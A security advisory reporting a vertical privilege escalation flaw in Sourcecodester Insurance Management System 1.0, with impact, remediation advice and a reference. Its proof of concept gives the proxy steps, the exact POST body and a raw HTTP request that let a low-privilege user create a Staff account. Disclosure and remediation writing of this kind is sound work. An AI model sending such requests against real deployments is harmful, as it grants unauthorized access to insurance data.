- Vendor: Sourcecodester
- Product: Insurance Management System
- Product URL: Insurance Management System
Vertical Privilege Escalation vulnerability in Insurance Management System 1.0 and earlier allows attacker to create a higher privileged account of Staff user by accessing the function defined out of his privileges access scope. It will allow the user to perform the tasks he is not supposed to do by maintaining the Staff account to himself.
- Vulnerability Name: Privilege Escalation in creating new Staff Account
- Severity: High
- Affected URL: http://localhost/e-insurance/Script./admin/core/new_staff
- HTTP Method: POST
The web application is vulnerable to Privilege Escalation(Vertical) attack in the adding the new staff functionality. An attacker can exploit this vulnerability by creating a higher privileged Staff account. In the provided example, the attacker creates a new Staff account by accessing the function out of his access privileges.
- Configure a web proxy in your browser.
- With the User role privilege account, intercept any request in the web proxy and modify the Request Method from GET to POST, modify the path to /e-insurance/Script./admin/core/new_staff and the post data to be fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1.
fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1- Send the request, the page will display a error, as it would try to view the admin page which is not available but the staff user is created successfully.
- You can verify the same in the admin account by navigating to the Staff section.
https://drive.google.com/file/d/1mzj80LmcBK0dFAY8xzwI-yfj8wxFqrnb/view?usp=sharing
fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1POST /e-insurance/Script./admin/core/new_staff HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1Privilege escalation compromises data security by giving the attacker less-restricted or unrestricted access. The sensitive information they access can be used for whatever purposes legitimate users might use it.
Access control vulnerabilities can be prevented by taking a defense-in-depth approach and applying the following principles:
- Never rely on obfuscation alone for access control.
- Unless a resource is intended to be publicly accessible, deny access by default.
- Wherever possible, use a single application-wide mechanism for enforcing access controls.
- At the code level, make it mandatory for developers to declare the access that is allowed for each resource, and deny access by default.
- Thoroughly audit and test access controls to ensure they work as designed.
https://portswigger.net/web-security/access-control
This report highlights the Privilege Escalation vulnerability present in the new_staff.php function ****of http://localhost/e-insurance/Script./admin/core/new_staff, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.